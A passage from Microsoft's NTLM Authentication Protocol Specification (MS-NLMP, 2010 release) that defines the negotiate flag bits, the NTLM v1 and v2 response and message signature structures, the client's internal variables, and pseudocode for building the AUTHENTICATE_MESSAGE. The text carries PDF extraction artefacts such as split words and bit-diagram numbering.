NEGOTIATE_MESSAGE, the server MUST return NTLMSSP_NEGOTIATE_128 to the client in the 
CHALLENGE_MESSAGE only if the client sets NTLMSSP_NEGOTIATE_SEAL or 
NTLMSSP_NEGOTIATE_SIGN. Otherwise it is ignored. If both NTLMSSP_NEGOTIATE_56 and 
NTLMSSP_NEGOTIATE_128 are requested and supp orted by the client and server, 
NTLMSSP_NEGOTIATE_56 and NTLMSSP_NEGOTIATE_128 will both be returned to the client. 
Clients and servers that set NTLMSSP_NEGOTIATE_SEAL SHOULD set 
NTLMSSP_NEGOTIATE_128 if it is supported. An alternate name for this field is  
NTLMSSP_NEGOTIATE_128 . <20>  
r1 (1 bit):  This bit is unused and MUST be zero.  
r2 (1 bit):  This bit is unused and MUST be zero.  
r3 (1 bit):  This bit is unused and MUST be zero.  
T (1 bit):  If set, requests the protocol version number. The data corresponding to this flag is 
provided in the Version  field of the NEGOTIATE_MESSAGE, the CHALLENGE_MESSAGE, and 
the AUTHENTICATE_MESSAGE. <21>  An alternate name for this field is 
NTLMSSP_NEGOTIATE_VERSION . 
r4 (1 bit):  This bit is unused and MUST be zero.  
 
34 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  S (1 bit):  If set, indicates that the TargetInfo  fields in the CHALLENGE_MESSAGE (section 
2.2.1.2 ) are populated. An alternate n ame for this field is 
NTLMSSP_NEGOTIATE_TARGET_INFO . 
R (1 bit):  If set, requests the usage of the LMOWF  (section 3.3). An alternate name for this 
field is NTLMSSP_REQUEST_NON_NT_SESSIO N_KEY . 
r5 (1 bit):  This bit is unused and MUST be zero.  
Q (1 bit):  If set, requests an identify level token . An alternate name for this field is 
NTLMSSP_NEGOTIATE_IDENTIFY . 
P (1 bit):  If set, requests usage of the NTLM v2 session sec urity. NTLM v2 session security is a 
misnomer because it is not NTLM v2. It is NTLM v1 using the extended session security that is 
also in NTLM v2. NTLMSSP_NEGOTIATE_LM_KEY and 
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY are mutually exclusive. If both 
NTLM SSP_NEGOTIATE_EXTENDED_SESSIONSECURITY and NTLMSSP_NEGOTIATE_LM_KEY 
are requested, NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY alone MUST be 
returned to the client. NTLM v2 authentication session key generation MUST be supported by 
both the client and the D C in order to be used, and extended  session security signing and 
sealing requires support from the client and the server in order to be used. <22>  An alternate 
name for this field is NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY . 
r6 (1 bi t):  This bit is unused and MUST be zero.  
O (1 bit):  If set, TargetName  MUST be a server name. The data corresponding to this flag is 
provided by the server in the TargetName  field of the CHALLENGE_MESSAGE. If this bit is 
set, then NTLMSSP_TARGET_TYPE_DOM AIN MUST NOT be set. This flag MUST be ignored in 
the NEGOTIATE_MESSAGE and the AUTHENTICATE_MESSAGE. An alternate name for this field 
is NTLMSSP_TARGET_TYPE_SERVER . 
N (1 bit):  If set, TargetName  MUST be a domain name. The data corresponding to this flag is 
provided by the server in the TargetName  field of the CHALLENGE_MESSAGE. If set, then 
NTLMSSP_TARGET_TYPE_SERVER MUST NOT be set. This flag MUST be ignored in the 
NEGOTIATE_MESSAGE and the AUTHENTICATE_MESSAGE. An alternate name for this field is 
NTLMSS P_TARGET_TYPE_DOMAIN . 
M (1 bit):  If set, requests the presence of a signature block on all messages. 
NTLMSSP_NEGOTIATE_ALWAYS_SIGN MUST be set in the NEGOTIATE_MESSAGE to the 
server and the CHALLENGE_MESSAGE to the client. NTLMSSP_NEGOTIATE_ALWAYS_SIGN is 
overridden by NTLMSSP_NEGOTIATE_S IGN and NTLMSSP_NEGOTIATE_SEAL, if they are 
supported. An alternate name for this field is NTLMSSP_NEGOTIATE_ALWAYS_SIGN . 
r7 (1 bit):  This bit is unused and MUST be zero.  
L (1 bit):  This flag indicates whether the Workstation  field is present. If this fl ag is not set, the 
Workstation  field MUST be ignored. If this flag is set, the length  field of the Workstation  
field specifies whether the workstation name is nonempty or not. <23>  An alternate name for 
this field is NTLMSSP_NEGOTIATE_O EM_WORKSTATION_SUPPLIED . 
K (1 bit):  If set, the domain name is provided (section 2.2.1.1 ).<24>  An alternate name for 
this field is NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED . 
J (1 bit):  If set, the connection SHOULD be anonymous. <25>  
r8 (1 bit):  This bit is unused and SHOULD be zero. <26>  
 
35 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  H (1 bit):  If set, requests usage of the NTLM v1 session security protocol. 
NTLMSSP_NEGOTIATE_NTLM MUST be s et in the NEGOTIATE_MESSAGE to the server and the 
CHALLENGE_MESSAGE to the client. An alternate name for this field is 
NTLMSSP_NEGOTIATE_NTLM . 
r9 (1 bit):  This bit is unused and MUST be zero.  
G (1 bit):  If set, requests LAN Manager (LM) session key compu tation. 
NTLMSSP_NEGOTIATE_LM_KEY and NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY 
are mutually exclusive. If both NTLMSSP_NEGOTIATE_LM_KEY and 
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY are requested, 
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY alone MUST be returned to the client. 
NTLM v2 authentication session key generation MUST be supported by both the client and the 
DC in order to be used, and extended session security signing and sealing requires support 
from the client and the server to be used. An alte rnate name for this field is 
NTLMSSP_NEGOTIATE_LM_KEY . 
F (1 bit):  If set, requests connectionless authentication. If NTLMSSP_NEGOTIATE_DATAGRAM is 
set, then NTLMSSP_NEGOTIATE_KEY_EXCH MUST always be set in the 
AUTHENTICATE_MESSAGE to the server and the CH ALLENGE_MESSAGE to the client. An 
alternate name for this field is NTLMSSP_NEGOTIATE_DATAGRAM . 
E (1 bit):  If set, requests session key negotiation for message confidentiality. If the client sends 
NTLMSSP_NEGOTIATE_SEAL to the server in the NEGOTIATE_MESSA GE, the server MUST 
return NTLMSSP_NEGOTIATE_SEAL to the client in the CHALLENGE_MESSAGE. Clients and 
servers that set NTLMSSP_NEGOTIATE_SEAL SHOULD always set NTLMSSP_NEGOTIATE_56 
and NTLMSSP_NEGOTIATE_128, if they are supported. An alternate name for thi s field is 
NTLMSSP_NEGOTIATE_SEAL . 
D (1 bit):  If set, requests session key negotiation for message signatures. If the client sends 
NTLMSSP_NEGOTIATE_SIGN to the server in the NEGOTIATE_MESSAGE, the server MUST 
return NTLMSSP_NEGOTIATE_SIGN to the client i n the CHALLENGE_MESSAGE. An alternate 
name for this field is NTLMSSP_NEGOTIATE_SIGN . 
r10 (1 bit):  This bit is unused and MUST be zero.  
C (1 bit):  If set, a TargetName  field of the CHALLENGE_MESSAGE  (section 2.2.1.2 ) MUST be 
supplied. An alternate name for this field is NTLMSSP_REQUEST_TARGET . 
B (1 bit):  If set, requests OEM character set encoding. An alternate name for this field is 
NTLM_NEGOTIATE_OEM . See bit  A for details.  
A (1 bit):  If set, requests Unicode  character set encoding. An alternate name for this field is 
NTLMSSP_NEGOTIATE_UNICODE . 
The A and B bits are evaluated together as follows:  
A==1: The choice of character set en coding MUST be Unicode.  
A==0 and B==1: The choice of character set encoding MUST be OEM.  
A==0 and B==0: The protocol MUST return SEC_E_INVALID_TOKEN.  
2.2.2.6   NTLM v1 Response: NTLM_RESPONSE  
The NTLM_RESPONSE structure defines the NTLM v1 authentication NtChallengeResponse  in the 
AUTHENTICATE_MESSAGE . This response is only used when NTLM v1 authentication is configured.  
 
36 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010   
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
Response  
... 
... 
... 
... 
... 
Response (24 bytes):  A 24-byte array of unsigned char that contains the client's 
NtChallengeResponse  (section 3.3.1). 
2.2.2.7   NTLM v2: NTLMv2_CLIENT_CHALLENGE  
The NTLMv2_CLIENT_CHALLENGE structure defines the client challenge in the 
AUTHENTICATE_MESSAGE . This structure is used only when NTLM v2 authentication is configured.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
RespType  HiRespType  Reserved1  
Reserved2  
TimeStamp  
... 
ChallengeFromClient  
... 
Reserved3  
AvPairs (variable)  
... 
 
37 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  RespType (1 byte):  An 8-bit unsigned char that contains the current version of the challenge 
response type. This field MUST be 0x01.  
HiRespType (1 byte):  An 8-bit unsigned char that contains the maximum supported version of 
the challenge response type. This field MUST be 0x01.  
Reserved1 (2 bytes):  A 16-bit unsigned integer that SHOULD be 0x0000 and MUST be ignored 
on receipt.  
Reserved2 (4 bytes):  A 32-bit unsigned integer that SHOULD be 0x00000000 and MUST be 
ignored on receipt.  
TimeStamp (8 bytes):  A 64-bit unsigned integer that contains the current system time, 
represented as the number of 100 nanosecond ticks elapsed since midnight of January 1, 
1601 ( UTC).  
ChallengeFromClient (8 bytes):  An 8-byte array of unsigned char that contains the client's 
ClientChallenge  (section 3.1.5.1.2 ). 
Reserved3 (4 bytes):  A 32-bit unsigned integer that SHOULD be 0x00000 000 and MUST be 
ignored on receipt.  
AvPairs (variable):  A byte array that contains a sequence of AV_PAIR  structures (section 
2.2.2.1 ). The sequence conta ins the server -naming context and is terminated by an AV_PAIR 
structure with an AvId  field of MsvAvEOL.  
2.2.2.8   NTLM2 V2 Response: NTLMv2_RESPONSE  
The NTLMv2_RESPONSE structure defines the NTLMv2 authentication NtChallengeResponse in the 
AUTHENTICATE_MESSAGE . This response is used only when NTLMv2 authentication is configured.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
Response  
... 
... 
... 
NTLMv2_CLIENT_CHALLENGE (variable)  
... 
Response (16 bytes):  A 16-byte array of unsigned char that contains the client's NT challenge -
response as defined in section 3.3.2. Response corresponds to the NTProofStr variable from 
section 3.3.2. 
 
38 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  NTLMv2_CLIENT_CHALLENGE (variable):  A variable -length byte array that contains the 
ClientChallenge as defined in section 3.3.2 . ChallengeFromClient corresponds to the temp 
variable from section 3.3.2 . 
2.2.2.9   NTLMSSP_MESSAGE_SIGNATURE  
The NTLMSSP_MESSAGE_SIGNATURE structure (section 3.4.4 ), specifies the signature block used 
for application message integrity and confidentiality. This structure is then passed back to the 
application, which embeds it within the application protocol messages, along with the NTLM -
encrypted or integrity -protect ed application message data.  
This structure MUST take one of the two following forms, depending on whether the 
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY flag is negotiated:  
NTLMSSP_MESSAGE_SIGNATURE  
NTLMSSP_MESSAGE_SIGNATURE for Extended Session Security  
2.2.2.9.1   NTLMSSP_MESSAGE_SIGNATURE  
This version of the NTLMSSP_MESSAGE_SIGNATURE structure MUST be used when the 
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY flag is not negotiated.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
Version  
RandomPad  
Checksum  
SeqNum  
Version (4 bytes):  A 32-bit unsigned integer that contains the signature version. This field 
MUST be 0x00000001.  
RandomPad (4 bytes):  A 4-byte array that contains the random pad for the message.  
Checksum (4 bytes):  A 4-byte array that contains the checksum for the message.  
SeqNum (4 bytes):  A 32-bit unsigned integer that contains the NTLM sequence number  for 
this application message.  
2.2.2.9.2   NTLMSSP_MESSAGE_SIGNATURE for Extended Session Security  
This version of the NTLMSSP_MESSAGE_SIGNATURE structure MUST be used when the 
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY flag is negotiated.  
 
39 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010   
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
Version  
Checksum  
... 
SeqNum  
Version (4 bytes):  A 32-bit unsigned integer that contains the signature version. This field 
MUST be 0x00000001.  
Checksum (8 bytes):  An 8-byte array that contains the checksum for the message.  
SeqNum (4 bytes):  A 32-bit unsigned integer that contains the NTLM sequence number for this 
application message.  
2.2.2.10   VERSION  
The VERSION structure contains Windows version information that SHOULD be ignored. This 
structure is used for debugging purposes only and its value does not affect NTLM message 
processing. It is present in the NEGOTIATE_MESSAGE , CHALLENGE_MESSAGE , and 
AUTHENTICATE_MESSAGE  messages only if NTLMSSP_NEGOTIATE_VERSION  is negotiated. <27>  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
ProductMajorVersion  ProductMinorVersion  ProductBuild  
Reserved  NTLMRevisionCurrent  
ProductMajorVersion (1 byte):  An 8-bit unsigned integer that contains the minor version 
number of the Windows operating system in use. This field SHOULD contain one of the 
following values: <28>  
Value  Meaning  
WINDOWS_MAJOR_VERSION_5  
0x05 The major version of the Windows operating system is 0x05.  
WINDOWS_MAJOR_VERSION_6  
0x06 The major version of the Windows operating system is 0x06.  
ProductMinorVersion (1 byte):  An 8-bit unsigned integer that contains the minor version 
number of the Wind ows operating system in use. This field SHOULD contain one of the 
following values: <29>  
 
40 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  Value  Meaning  
WINDOWS_MINOR_VERSION_0  
0x00 The minor version of the Windows operating system is 0x00.  
WINDOWS_MINOR_VERSION_1  
0x01 The minor vers ion of the Windows operating system is 0x01.  
WINDOWS_MINOR_VERSION_2  
0x02 The minor version of the Windows operating system is 0x02.  
ProductBuild (2 bytes):  A 16-bit unsigned integer that contains the build number of the 
Windows operating system in use. This field SHOULD be set to a 16 -bit quantity that identifies 
the operating system build number.  
Reserved (3 bytes):  A 24-bit data area that SHOULD be set to zero and MUST be ignored by 
the recipient.  
NTLMRevisionCurrent (1 byte):  An 8-bit unsigned integer that contains a value indicating the 
current revision of the NTLMSSP in use. This field SHOULD contain the following value:  
Value  Meaning  
NTLMSSP_REVISION_ W2K3  
0x0F Version 15 of the NTLMSSP is in use.  
 
41 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  3   Protocol Details  
The following sections offer a detailed specification of the NTLM message computation:  
Sections 3.1.5 and 3.2.5  specify how the client and server compute messages and respond to 
messages.  
Section 3.3 specifies how the response computation is calculated, depending on whether NTLM v1 
or NTLM v2 is used. This include s the ComputeResponse function, as well as the NTOWF()  and 
LMOWF() functions, which are used by the ComputeResponse function.  
Section 3.4 specifies how message integrity and message c onfidentiality are provided, including a 
detailed specification of the algorithms used to calculate the signing and sealing keys.  
The Cryptographic Operations Reference in section 6 defines the cryptograp hic primitives used in 
this section.  
3.1   Client Details  
3.1.1   Abstract Data Model  
The following sections specify variables that are internal to the client and are maintained across the 
NTLM authentication sequence.  
3.1.1.1   Variables Internal to the Protocol  
ClientConfigFlags : The set of client configuration flags (section 2.2.2.5 ) that specify the full set of 
capabilities of the client.  
ExportedSessionKey : A 128 -bit (16 -byte) session key used to derive ClientSigningKey, 
ClientSealingKey, ServerSealingKey, and ServerSigningKey.  
NegFlg : The set of configuration flags (section 2.2.2.5 ) that specifies the nego tiated capabilities of 
the client and server for the current NTLM session.  
User: A string that indicates the name of the user.  
UserDom : A string that indicates the name of the user's domain.  
The following NTLM configuration variables are internal to the cl ient and impact all authenticated 
sessions:  
NoLMResponseNTLMv1 : A Boolean setting that controls using the NTLM response for the LM 
response to the server challenge when NTLMv1 authentication is used. <30>  
ClientBlocked : A Boolean settin g that disables the client from sending NTLM_AUTHENTICATE 
messages. <31>  
ClientBlockExceptions : A list of server names that can use NTLM authentication. <32>  
ClientRequire128bitEncryption : A Boolean setting that re quires the client to use 128 -bit 
encryption. <33>  
The following variables are internal to the client and are maintained for the entire length of the 
authenticated session:  
 
42 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  MaxLifetime : An integer that indicates the maximum lifetime for  challenge/response pairs. <34>  
ClientSigningKey : The signing key used by the client to sign messages and used by the server to 
verify signed client messages. It is generated after the client is authenticated by the server and is 
not passed over the wire.  
ClientSealingKey : The sealing key used by the client to seal messages and used by the server to 
unseal client messages. It is generated after the client is authenticated by the server and is not 
passed over the wire.  
SeqNum : A 4-byte s equence number (section 3.4.4).  
ServerSealingKey : The sealing key used by the server to seal messages and used by the client to 
unseal server messages. It is generated after the client is authenticated by  the server and is not 
passed over the wire.  
ServerSigningKey : The signing key used by the server to sign messages and used by the client to 
verify signed server messages. It is generated after the client is authenticated by the server and is 
not passed ov er the wire.  
3.1.1.2   Variables Exposed to the Application  
The following parameters are provided by the application to the NTLM client. These logical 
parameters can influence various protocol -defined flags. <35>  
Note   The following variables are logical, abstract parameters that an implementation MUST 
maintain and expose to provide the proper level of service . How these variables are maintained and 
exposed is up to the implementation.  
Integri ty: A Boolean setting which indicates that the caller wants to sign messages so that they 
cannot be tampered with while in transit. Setting this flag results in the NTLMSSP_NEGOTIATE_SIGN 
flag being set in the NegotiateFlags  field of the NTLM NEGOTIATE_MES SAGE.  
Replay Detect:  A Boolean setting which indicates that the caller wants to sign messages so that 
they cannot be replayed. Setting this flag results in the NTLMSSP_NEGOTIATE_SIGN flag being set 
in the NegotiateFlags  field of the NTLM NEGOTIATE_MESSAGE . 
Sequence Detect:  A Boolean setting which indicates that the caller wants to sign messages so 
that they cannot be sent out of order. Setting this flag results in the NTLMSSP_NEGOTIATE_SIGN 
flag being set in the NegotiateFlags  field of the NTLM NEGOTIATE_ MESSAGE.  
Confidentiality:  A Boolean setting which indicates that the caller wants to encrypt messages so 
that they cannot be read while in transit. If the Confidentiality option is selected by the client, NTLM 
performs a bitwise OR operation with the follo wing NTLM Negotiate Flags into the 
ClientConfigFlags . (The ClientConfigFlags indicate which features the client host supports.)  
NTLMSSP_NEGOTIATE_SEAL  
NTLMSSP_NEGOTIATE_KEY_EXCH  
NTLMSSP_NEGOTIATE_LM_KEY  
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY  
Datagram:  A Boolean setting which indicates that the connectionless mode of NTLM is to be 
selected. If the Datagram option is selected by the client, then connectionless mode is used and 
NTLM performs a bitwise OR operation with the following NTLM Negotiate Flag int o the 
ClientConfigFlags . 
 
43 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  NTLMSSP_NEGOTIATE_DATAGRAM  
Identify:  A Boolean setting which indicates that the caller wants the server to know the identity of 
the caller, but that the server not be allowed to impersonate the caller to resources on that system. 
Setting this flag results in the NTLMSSP_NEGOTIATE_IDENTIFY flag being set. Indicates that the 
GSS_C_IDENTIFY_FLAG flag was set in the GSS_Init_sec_context call, as discussed in [RFC4757]  
section 7. 1, and results in the GSS_C_IDENTIFY_FLAG flag set in the authenticator's checksum  
field ( [RFC4757]  section 7.1).  
The following variables are used by applications for channel binding token support:  
ClientSuppliedTargetName: Service principal name (SPN) of the service that the client wishes to 
authenticate to. This value is optional. <36>  
ClientChannelBindingsUnhashed: An octet string provided by the application used for channel 
binding. This value is optional. <37>  
3.1.2   Timers  
None.  
3.1.3   Initialization  
None.  
3.1.4   Higher -Layer Triggered Events  
The application initiates NTLM authentication through the Security Support Provider Interface 
(SSPI) , the Microsoft implementation of GSS -API [RFC2743] .  NTLM does not support RFC 2743 
token framing (section 3.1 [RFC2743] ). 
GSS_Init_sec_context  
The client application calls GSS_Init _sec_context() to establish a security context with the server 
application.  
If the ClientBlocked == TRUE and targ_name ( [RFC2743]  section 2.2.1) does not equal any of 
the ClientBlockExceptions ser ver names, then the NTLM client MUST return 
STATUS_NOT_SUPPORTED to the client application. <38>  
NTLM has no requirements on which flags are used and will simply honor what was requested by 
the application or protocol. For an example of  such a protocol specification, see [MS-RPCE]  
section 3.3.1.5.2.2. The application will send the NEGOTIATE_MESSAGE (section 2.2.1.1 ) to the 
server application.  
When the client a pplication receives the CHALLENGE_MESSAGE (section 2.2.1.2 ) from the server 
application, the client application will call GSS_Init_sec_context() with the 
CHALLENGE_MESSAGE as input. The client application will send the AUTHENTICATE_MESSAGE 
(section 2.2.1.3 ) to the server application.  
GSS_Wrap  
Once the security context is established, the client application can call GSS_WrapEx() (section 
3.4.6) to encrypt messages.  
 
44 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  GSS_Unwrap  
Once the security context is established, the client application can call GSS_UnwrapEx() (section 
3.4.7) to decrypt messages that were encrypted by GSS_WrapEx.  
GSS_GetMIC  
Once the security context is established, the client application can call GSS_GetMICEx() (section 
3.4.8) to sign messages, producing an NTLMSSP_MESSAGE_SIGNATURE structu re (section 
2.2.2.9 ). 
GSS_VerifyMIC  
Once the security context is established, the client application can call GSS_VerifyMICEx() 
(section 3.4.9) to verify a signature produced by GSS_GetMICEx().  
3.1.5   Message Processing Events and Sequencing Rules  
This section specifies how the client processes and returns messages. As discussed earlier, the 
message transport is provided by the application that is using NTLM.  
3.1.5.1   Connection -Oriented  
Message processing on the client takes place in the following two cases:  
When the application initiates authentication and the client then sends a NEGOTIATE_MESSAGE . 
When the client receives a CHALLENGE_MESSAGE  from the server and then sends back an 
AUTHENTICATE_MESSAGE . 
These two cases are described in the following s ections.  
When encryption is desired, the stream cipher RC4 is used. The key for RC4 is established at the 
start of the session for an instance of RC4 dedicated to that session. RC4 then continues to generate 
key stream in order over all messages of the ses sion, without rekeying.  
The pseudocode RC4(handle, message) is defined as the bytes of the message XORed with bytes of 
the RC4 key stream, using the current state of the session's RC4 internal key state. When the 
session is torn down, the key structure is destroyed.  
The pseudocode RC4K(key,message) is defined as a one -time instance of RC4 whose key is 
initialized to key, after which RC4 is applied to the message. On completion of this operation, the 
internal key state is destroyed.  
3.1.5.1.1   Client Initiates the NEGOTIATE_MESSAGE  
When the client application initiates the exchange through SSPI, the NTLM client sends the 
NEGOTIATE_MESSAGE  to the server, which is embedded in an application protocol message, and 
encoded according to that application protocol.  
If the ClientBlocked == TRUE and targ_name ( [RFC2743]  section 2.2.1) does not equal any of the 
ClientBlockExceptions server names, then the NTLM client MUST return STATUS_NOT_SUPPORTED 
to the client application. <39>  
The client prepares a NEGOTIATE_MESSAGE and sets the following fields:  
The Signature  field i s set to the string, "NTLMSSP".  
 
45 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  The MessageType  field is set to NtLmNegotiate.  
The client sets the following configuration flags in the NegotiateFlags  field of the 
NEGOTIATE_MESSAGE:  
NTLMSSP_REQUEST_TARGET  
NTLMSSP_NEGOTIATE_NTLM  
NTLMSSP_NEGOTIATE_ALWAYS_ SIGN 
NTLMSSP_NEGOTIATE_UNICODE  
If LM authentication is not being used, then the client sets the following configuration flag in the 
NegotiateFlags  field of the NEGOTIATE_MESSAGE:  
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY  
In addition, the client sets the f lags specified by the application in the NegotiateFlags  field in 
addition to the initialized flags.  
If the NTLMSSP_NEGOTIATE_VERSION flag is set by the client application, the Version  field MUST 
be set to the current version (section 2.2.2.10 ), the DomainName  field MUST be set to a zero -
length string, and the Workstation  field MUST be set to a zero -length string.  
3.1.5.1.2   Client Receives a CHALLENGE_MESSAGE from the Server  
When the client receives a CHALLENGE_MESSAGE  from the server, it MUST determine if the features 
selected by the server are strong enough for the client authentication policy. If not, the client MUST 
return an error to the calling application. Otherwise, the client responds with an 
AUTHENTICATE_MESSAGE  message.  
If ClientRequire128bitEncryption == TRUE, then if 128 -bit encryption is not negotiated, then the 
client MUST return SEC_E_UNSUPPORTED_FUNCTION to the application.  
The client processes the CHAL LENGE_MESSAGE and constructs an AUTHENTICATE_MESSAGE per 
the following pseudocode where all strings are encoded as RPC_UNICODE_STRING ( [MS-DTYP]  
section 2.3.6):  
-- Input:    
--   ClientConfigFlags, User, and UserDom - Defined in  section 3.1.1.  
--   NbMachineName - The NETBIOS machine name of the server.  
--   An NTLM NEGOTIATE_MESSAGE whose fields are defined in  
     section 2.2.1.2.  
--   An NTLM CHALLENGE_MESSAGE whose message fields are defined in  
     section 2.2.1.2.  
--   An NTLM AUTHENTICATE_MESSAGE whose message fields are  
     defined in section 2.2.1.3 with MIC field set to 0.  
--   OPTIONAL ClientSuppliedTargetName - Defined in section 3.1.1.2  
--   OPTIONAL ClientChannelBindingUnhashed - Defined in section 3.1.1.2  
-- 
-- Output:  
--   ClientHandle - The handle to a key state structure corresponding  
--   to the current state of the ClientSealingKey  
--   ServerHandle - The handle to a key state structure corresponding  
--   to the current state of the ServerSealingKey  
--   An NTLM AUTHENTICATE_MESSAGE whose message fields are defined in  
     section 2.2.1.3.  
 
46 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  -- 
--   The following NTLM keys generated by the client are defined in  
     section 3.1.1:  
--   ExportedSessionKey, ClientSigningKey, ClientSealingKey,  
     ServerSigning Key, and ServerSealingKey.  
 
-- Temporary variables that do not pass over the wire are defined  
   below: 
--   KeyExchangeKey, ResponseKeyNT, ResponseKeyLM, SessionBaseKey -  
     Temporary variables used to store 128 -bit keys.  
--   Time - Temporary variable used to hold the 64 -bit time.  
--   MIC - message integrity for the NTLM NEGOTIATE_MESSAGE,  
     CHALLENGE_MESSAGE and AUTHENTICATE_MESSAGE   
-- 
-- Functions used:  
--   NTOWFv1, LMOWFv1, NTOWFv2, LMOWFv2, ComputeResponse - Defined in 
     section 3.3  
--   KXKEY, SIGNKEY, SEALKEY - Defined in sections 3.4.5, 3.4.6,  
     and 3.4.7  
--   Currenttime, NIL, NONCE - Defined in section 6.  
Fields MUST be set as follows:  
ChallengeFromClient  (section 2.2.2.4 ) to an 8 -byte nonce.  
UserName  to User.  
DomainName  to UserDom.  
Signature  to the string "NTLMSSP".  
MessageType  to NtLmAuthenticate.  
If the NTLMSSP_NEGOTIATE_VERSION flag is set by the client applicatio n, the Version  field MUST 
be set to the current version (section 2.2.2.10 ), and the Workstation  field MUST be set to 
NbMachineName.  
If NTLM v2 authentication is used, the client SHOULD send the timestamp i n the 
CHALLENGE_MESSAGE. <40>  
If there exists a CHALLENGE_MESSAGE.NTLMv2_CLIENT_CHALLENGE.AvId ==  
MsvAvTimestamp  
     Set Time to CHALLENGE_MESSAGE.TargetInfo.Value of that AVPair  
Else 
     Set Time to Currenttime  
Endif 
 
If NTLM v2 authentication is used and the CHALLENGE_MESSAGE contains a TargetInfo field, the 
client SHOULD NOT send the LmChallengeResponse and SHOULD set the LmChallengeResponseLen 
and LmChallengeResponseMaxLen fields in the AUTHENTICATE_MESSAGE to zero. <41>  
Response keys are computed using the ComputeResponse() function, as specified in section 3.3. 
 
 
47 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  Set AUTHENTICATE_MESSAGE.NtChallengeResponse,  
   AUTHENTICATE_MESSAGE.LmChallenge Response, SessionBaseKey to  
ComputeResponse(CHALLENGE_MESSAGE.NegotiateFlags, ResponseKeyNT,  
   ResponseKeyLM, CHALLENGE_MESSAGE.ServerChallenge,  
   AUTHENTICATE_MESSAGE.ClientChallenge, Time,  
   CHALLENGE_MESSAGE.TargetInfo)  
 
Set KeyExchangeKey to KXK EY(SessionBaseKey, LmChallengeResponse,  
    CHALLENGE_MESSAGE.ServerChallenge)  
If (NTLMSSP_NEGOTIATE_KEY_EXCH  bit is set in  
CHALLENGE_MESSAGE.NegotiateFlags )  
     Set ExportedSessionKey to NONCE(16)  
     Set AUTHENTICATE_MESSAGE.EncryptedRandomSessionKe y to  
     RC4K(KeyExchangeKey, ExportedSessionKey)  
Else  
     Set ExportedSessionKey to KeyExchangeKey  
     Set AUTHENTICATE_MESSAGE.EncryptedRandomSessionKey to NIL  
Endif 
 
